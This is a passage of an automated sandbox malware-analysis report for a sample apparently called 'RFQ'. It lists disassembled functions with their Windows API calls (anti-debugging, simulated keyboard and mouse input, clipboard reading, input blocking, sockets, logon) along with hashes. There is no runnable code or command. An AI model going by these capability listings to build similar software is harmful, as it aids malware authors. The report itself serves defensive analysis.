                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                          • String ID: *.*$\VH
                                                                          • API String ID: 2786137511-2657498754
                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                          Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID: pqI
                                                                          • API String ID: 2579439406-2459173057
                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                          Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicollmouse_event
                                                                          • String ID: DOWN
                                                                          • API String ID: 1033544147-711622031
                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                          Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 3031425849-0
                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                          Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 4170576061-0
                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                          Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                          • IsIconic.USER32 ref: 0047A393
                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                          Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                          Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                          Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: U$\
                                                                          • API String ID: 4104443479-100911408
                                                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                          Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                          Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                          Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                          • String ID:
                                                                          • API String ID: 901099227-0
                                                                          • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                          • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                          Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Proc
                                                                          • String ID:
                                                                          • API String ID: 2346855178-0
                                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                          Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                          Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
